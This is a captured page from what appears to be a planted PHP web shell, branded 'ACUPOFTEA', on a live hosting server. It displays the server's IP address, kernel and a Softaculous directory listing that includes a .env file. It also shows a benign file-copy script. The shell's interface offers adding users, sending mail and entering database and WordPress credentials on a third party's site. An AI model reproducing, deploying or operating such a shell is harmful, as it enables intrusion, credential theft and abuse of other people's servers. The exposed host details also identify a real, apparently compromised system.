System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
akaunting
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
copy_dir.php
<?php @unlink('copy_dir.php'); $src = '[[srcpath]]/storage/app/uploads'; $dst = '[[softpath]]/storage/app/uploads'; function copy_r($path, $dest){ // Is it a Directory ? if( is_dir($path) ){ // Create the Destination Dir @mkdir($dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } // Start reading the current directory $objects = scandir($path); if( sizeof($objects) > 0 ){ foreach( $objects as $file ) { if( $file == "." || $file == ".." ){ continue; } // Go on copy_r( $path.'/'.$file, $dest.'/'.$file ); } } return true; }elseif( is_file($path) ){ //To exclude some files if set in script's clone.php's __pre_unzip() function $ret = copy($path, $dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } return $ret; }else{ return false; } } copy_r($src, $dst);
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
..
DIR
-
drwxr-xr-x
2025-12-16 09:39:04
images
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
php53
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
php56
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
php71
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
php81
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
php82
DIR
-
drwxr-xr-x
2025-12-16 09:38:51
.env
text/plain
727 B
-rw-r--r--
2022-06-02 07:46:46
clone.php
text/x-php
4.69 KB
-rw-r--r--
2025-12-15 07:17:50
copy_dir.php
text/x-php
1.33 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.38 KB
-rw-r--r--
2025-12-15 07:17:50
edit.xml
text/html
447 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
9.97 KB
-rw-r--r--
2025-12-15 07:17:50
fileindex.php
text/plain
254 B
-rw-r--r--
2025-02-17 04:42:34
import.php
text/x-php
3.52 KB
-rw-r--r--
2025-12-15 07:17:50
info.xml
text/html
5.31 KB
-rw-r--r--
2025-12-15 03:28:26
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
4.19 KB
-rw-r--r--
2025-12-15 07:17:50
install.xml
text/html
2.94 KB
-rw-r--r--
2022-06-27 08:19:40
md5
text/plain
1.99 KB
-rw-r--r--
2025-12-15 07:17:50
notes.txt
text/plain
722 B
-rw-r--r--
2023-10-09 06:53:50
update_pass.php
text/x-php
555 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - accounting.gulfstore-gcc.com